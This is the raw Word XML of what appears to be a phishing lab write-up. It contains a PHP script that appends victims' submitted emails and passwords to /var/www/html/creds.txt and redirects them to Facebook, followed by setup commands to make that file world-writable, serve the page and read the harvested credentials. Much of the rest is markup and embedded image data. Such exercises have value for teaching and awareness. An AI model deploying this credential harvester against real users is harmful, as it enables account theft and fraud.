        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>append</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>added</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>end</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC8751C" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="562"/>
      </w:pPr>
      <w:r>
        <w:t>$file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("/var/www/html/creds.txt",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>"a");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0141654E" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="562" w:right="5937"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Ensure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>opened</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>successfully if ($file) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D8024E" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="761" w:right="4975" w:firstLine="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// Write the email and password to the file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fwrite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">($file, "Email: " . $email . "\n"); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fwrite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($file,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"Password:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>$password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"\n\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDD412E" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3236"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="763"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>after</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> writing</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>fclose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>($file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1A54A9" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3941"/>
          <w:tab w:val="left" w:pos="4776"/>
        </w:tabs>
        <w:ind w:left="761" w:right="3854" w:firstLine="2"/>
      </w:pPr>
      <w:r>
        <w:t>// Redirect the user to Facebook (or any other URL) header('Location: https</w:t>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r>
          <w:t>://www.facebook.com');</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:tab/>
        <w:t>exit();}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>{ echo "Error: Unable to open file!";</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>exit();}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392E8DCB" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="229" w:lineRule="exact"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"Error:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Invalid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>method!";}?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0279A4" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="561"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="561" w:hanging="201"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C015AB3" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>777</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>/var/www/html/creds.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0161DD" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="611"/>
        </w:tabs>
        <w:spacing w:before="228"/>
        <w:ind w:left="360" w:right="5730" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>working</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>commands(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>nano</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">index.html </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 755 /var/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>post.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F143726" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05023D7A" wp14:editId="41FD1EA7">
            <wp:extent cx="3915353" cy="67865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3915353" cy="678656"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05947ACF" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="13"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>/var/www/html/creds.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C380E0C" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="268DC263" wp14:editId="27672203">
            <wp:extent cx="3226121" cy="65722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3226121" cy="657225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7FBAB2" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
        <w:ind w:left="360" w:right="6937"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">apache2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:color w:val="0462C1"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>http://127.0.0.1/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282A44CA" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="15"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487590400" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A90A2F5" wp14:editId="59C870FC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>732790</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>125085</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4343400" cy="212026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0" cy="2120265"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4343400" cy="2120265"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="20" name="Image 20"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId22" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="9525" y="9525"/>
                            <a:ext cx="4324350" cy="2076299"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="21" name="Graphic 21"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4762" y="4762"/>
                            <a:ext cx="4333875" cy="2110740"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="4333875" h="2110740">
                                <a:moveTo>
                                  <a:pt x="0" y="2110740"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4333875" y="2110740"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4333875" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="21107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B83BEAF" id="Group 19" o:spid="_x0000_s1026" style="position:absolute;margin-left:57.7pt;margin-top:9.85pt;width:342pt;height:166.95pt;z-index:-15726080;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="43434,21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1KVluAwAAbAgAAA4AAABkcnMvZTJvRG9jLnhtbJxW227bOBB9X2D/&#10;QdB7I9u5NUKcYtFsgwBFN9im6DNNURJRiuSS9CV/v2dI0VbtFr04sDQ0h8Mzh2eGuX2zG1SxEc5L&#10;o5fl/GxWFkJz00jdLctPz+9evS4LH5humDJaLMsX4cs3d3/+cbu1tViY3qhGuAJBtK+3dln2Idi6&#10;qjzvxcD8mbFCY7I1bmABQ9dVjWNbRB9UtZjNrqqtcY11hgvv8et9mizvYvy2FTz807ZehEItS2AL&#10;8enic0XP6u6W1Z1jtpd8hMF+A8XApMam+1D3LLBi7eRJqEFyZ7xpwxk3Q2XaVnIRc0A289lRNg/O&#10;rG3Mpau3nd3TBGqPePrtsPzD5sHZj/bJJfQw3xv+xYOXamu7ejpP4+7gvGvdQIuQRLGLjL7sGRW7&#10;UHD8eHGOvxmI55hbzBezxdVl4pz3OJiTdbz/+wcrK1anjSO8PRwreY3vSBGsE4p+LCWsCmsnyjHI&#10;8FMxBua+rO0rnKZlQa6kkuElKhPnRqD05klyYpcGYPPJFbIBF+BEswEV8TiwThQYg/LsQyvoBE4C&#10;rJS076RSxDvZI1QI+kgQ38g2ie3e8PUgdEjV44QCaqN9L60vC1eLYSUAzz02cxwaKjcAonVSh3Rs&#10;PjgReE/7t8DxLwqMgLJ6PxFBH3BSCn6U15Fibi4Xl2UBYUQDYVh90M3i4vwy62Z2fbW4uSEA+9Nn&#10;tXU+PAgzFGQAMZCAclazzXs/YsouI5MJRsQHVNQi0HN85hCjExZ/qaw+9swKQKCwk4MGj+mgH8Yu&#10;s5hTJqMXVd44+g5LF0g+shSNI5bOz19fg8NUXfPZ9UWU0YQlvk4sTZlBl2oSR2Crzxbf6WwSl9Qw&#10;VWyYAboAv2WBhrlKKoDUaR0FJbPYUqWPWHoq9ASF5gezEc8meoZDuWcPpAOwBx+lp777mLF5TNPL&#10;fvltY+ypfyYie+R38oSycrPC/nkuv6c+XyPNHlwZLxJ4IiBmsScFEae0K038RI0TDd4o2eQa9q5b&#10;vVWu2DC6n+JnlPlXbiTke+b75BenRjelsTdpKamHrJVpXtBltpDbsvT/rRm1NPWoIW+kHbLhsrHK&#10;hgvqrYn3ZDwu7Pm8+8ycHSssoDg/mKzyk0JLvrRSm7/WwbQyVuEB0QgUFReteKVF4sbrl+7M6Th6&#10;Hf5JuPsfAAD//wMAUEsDBAoAAAAAAAAAIQCJzY7v6tkAAOrZAAAVAAAAZHJzL21lZGlhL2ltYWdl&#10;MS5qcGVn/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYI&#10;DAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkUDQsN&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/wAARCAH0&#10;BB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o+H3gfUfiX430TwrpBhGp6vdJaW5uH2Rh2OAWODgfhX2D/w6M+LH/Q0eDf8AwKu//kavh201&#10;c6fdQ3NrdtbXMLiSOaGQo6MDkMpHIIPcV3H/AA0X8Sh/zU3xZ/4Prr/45XS79DM779o79jnxr+zL&#10;J4fHiO+0bUo9bd4raTSriRwHXblWEiIR94c4I968f8U+GL/wdrdxpOpIkd5BtLrG4cfMoYcj2Ip3&#10;ib4g+IPHUsc/iHxJqfiGS1QhJNTvpLlolJGcF2OASR0rDe+ikYs0wZj1JbJprzESV6T4e+BGv+KP&#10;hini/Th5/m6tHpkNh5ZVpQ5CCYOSF2+a6R8929jXmH2uH/nqv516D4O/aA8U+DptFig1uWfRtMEU&#10;a6OzhbaSJLkXO0rjGTIN2/Bb3ofkA2T4JeMo0vm/suJhZxrNJ5d7btvQxtIDHh/3vyI7HZuwFbOM&#10;GsHxj4M1jwB4guNE160+w6pb482381JCmRkAlCRn2zXRXPx+1+50nVbM3NqkuoSoWuEt4QYoViki&#10;8mNQmI1KyMDtxkEg5ya5bxV481DxtqEN7rN+l1PDAlrFtRI1jiTO1FVAAAMnt3o1Ay6938b/ALKV&#10;/wCEvD8+pQeIIL2WJIv9CuLc2kru8lugKl22mL/SVxLnBKOMDFeBfa4f+eq/nXX2Hxm8S6br+oa1&#10;BreNSv1iW5meKN/MEbI0fyspA2tGhGB2oYG0v7P/AI9bUUsf7CxdyTtbxxG7gBlZYhKxT5/mRUZW&#10;LjKgEZNZHjX4U+Kvh1DBJ4j0l9LE00sCLLLGXLxsUcbVYkAMpGcYOOM1c/4aB8Y/aYJ/7fUy28jS&#10;QsbaH91uiWF1X5OFaNVUqPlIHIrB1n4karr+kLpd5fxNYC5a88iKCOIGVs5Y7VGfvED0